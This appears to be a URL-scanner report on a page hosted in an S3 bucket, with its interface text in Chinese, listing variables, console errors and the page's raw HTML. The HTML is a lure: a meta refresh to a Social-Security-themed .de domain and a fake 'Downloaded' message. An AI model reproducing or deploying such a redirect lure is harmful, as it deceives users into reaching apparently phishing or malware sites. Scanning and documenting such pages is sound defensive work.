https://socialsecurityonlinestatements.de/docs/

提交的 URL:
https://saicopart25487120.s3.me-central-1.amazonaws.com/statm1nt55698_qra463570.html
报告完成时间:

链接 · 找到 0 个

从页面中识别出的传出链接

JavaScript 变量 · 找到 5 个

在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问

名称类型
0object
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
_cf_translationobject

控制台日志消息 · 找到 3 条

记录到 Web 控制台的消息

类型类别记录
errornetwork
URL
https://saicopart25487120.s3.me-central-1.amazonaws.com/favicon.ico
文本
Failed to load resource: the server responded with a status of 403 (Forbidden)
errornetwork
URL
https://socialsecurityonlinestatements.de/docs/
文本
Failed to load resource: the server responded with a status of 403 ()
errornetwork
URL
https://socialsecurityonlinestatements.de/favicon.ico
文本
Failed to load resource: the server responded with a status of 403 ()

HTML

页面的原始 HTML 正文

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="refresh" content="1;url=https://socialsecurityonlinestatements.de/docs/">
    <title>Redirecting...</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            padding-top: 50px;
            background-color: #f3f3f3;
        }
        .content {
            width: 80%;
            margin: auto;
            padding: 20px;
            background-color: white;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0,0,0,0.1);
        }
        .spinner {
            border: 4px solid #f3f3f3; /* Light grey */
            border-top: 4px solid #3498db; /* Blue */
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 2s linear infinite;
            margin: auto;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        .confirmed {
            font-size: 20px;
            color: green;
            margin-top: 20px;
        }
    </style>
    <script type="text/javascript">
        function showConfirmation() {
            var spinner = document.querySelector('.spinner');
            spinner.style.display = 'none';

            var confirmedText = document.createElement('div');
            confirmedText.className = 'confirmed';
            confirmedText.textContent = 'Downloaded';
            document.querySelector('.content').appendChild(confirmedText);
        }

        window.onload = function() {
            setTimeout(showConfirmation, 3000);
        }
    </script>
</head>
<body>
    <div class="content">
        <div class="spinner"></div>
    </div>


</body></html>